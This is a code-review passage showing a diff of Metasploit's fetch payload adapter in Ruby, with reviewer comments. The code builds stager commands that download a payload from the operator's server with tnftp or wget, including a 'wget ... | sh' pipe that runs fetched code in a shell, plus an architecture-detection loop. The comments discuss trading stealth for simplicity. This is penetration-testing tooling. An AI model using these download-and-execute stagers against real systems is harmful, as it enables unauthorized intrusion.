lib/msf/core/payload/adapter/fetch.rb

```diff
@@ -1,446 +1,558 @@
-    else
-      fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
-    end
-    _execute_add(get_file_cmd)
-  end
+    def _generate_tnftp_command(uri)
+      case fetch_protocol
+      when 'FTP'
+        get_file_cmd = "tnftp -Vo #{_remote_destination_nix} ftp://#{download_uri(uri)}"
+      when 'HTTP'
+        get_file_cmd = "tnftp -Vo #{_remote_destination_nix} http://#{download_uri(uri)}"
+      when 'HTTPS'
+        get_file_cmd = "tnftp -Vo #{_remote_destination_nix} https://#{download_uri(uri)}"
+      else
+        fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
+      end
+      _execute_add(get_file_cmd)
+    end
 
-  def _generate_wget_command
-    case fetch_protocol
-    when 'HTTPS'
-      get_file_cmd = "wget -qO #{_remote_destination} --no-check-certificate https://#{download_uri}"
-    when 'HTTP'
-      get_file_cmd = "wget -qO #{_remote_destination} http://#{download_uri}"
-    else
-      fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
+    def _generate_wget_command(uri)
+      case fetch_protocol
+      when 'HTTPS'
+        get_file_cmd = "wget -qO #{_remote_destination} --no-check-certificate https://#{download_uri(uri)}"
+      when 'HTTP'
+        get_file_cmd = "wget -qO #{_remote_destination} http://#{download_uri(uri)}"
+      else
+        fail_with(Msf::Module::Failure::BadConfig, 'Unsupported Binary Selected')
+      end
+
+      _execute_add(get_file_cmd)
     end
 
-    _execute_add(get_file_cmd)
-  end
+    def _generate_wget_pipe(uri)
+      case fetch_protocol
+      when 'HTTPS'
+        return "wget --no-check-certificate -qO- https://#{_download_pipe(uri)}|sh"
+      when 'HTTP'
+        return "wget -qO- http://#{_download_pipe(uri)}|sh"
+      else
+        fail_with(Msf::Module::Failure::BadConfig, "Unsupported protocol: #{fetch_protocol.inspect}")
+      end
+    end
 
-  def _generate_wget_pipe
-    case fetch_protocol
-    when 'HTTPS'
-      return "wget --no-check-certificate -qO- https://#{_download_pipe}|sh"
-    when 'HTTP'
-      return "wget -qO- http://#{_download_pipe}|sh"
-    else
-      fail_with(Msf::Module::Failure::BadConfig, "Unsupported protocol: #{fetch_protocol.inspect}")
+    def _generate_multi_commands(arch_payloads = [])
+      # There is a great deal of room for improvement here.
+      script = 'archinfo=$(uname -m);'
+      arch_payloads.each do |srv_entry|
+        vprint_status("Adding #{srv_entry[:uri]} for #{srv_entry[:arch]}")
+        os_arches(srv_entry[:arch]).each do |os_arch|
+          script << "if [ #{os_arch} = $archinfo ]; then (#{generate_fetch_commands(srv_entry[:uri])}); fi; "
+          # If I add an exit to this so that it leaves after launching, FETCH_FILELESS bash fails
+        end
+      end
+      print_status(script)
+      script
+    end
+
+    def _generate_bruteforce_multi_commands(arch_payloads = [])
```

Comment:
I completely forgot I added this- my thought was that in the event that we were willing to trade stealth for simplicity, we would not bother checking the arch, and just try to run everything..... Not exactly subtle, but I ran into issues where the arch names were not really consistent, so this would mean it would *just work*
Probably adding an advanced option for brute forcing is they way to go

Reply:
Maybe add a `TODO` then, as this is a tad super-gross :D

Reply:
This doesn't look like it's referenced anywhere, and I'd be inclined to try and advance this without it as an option for MVP.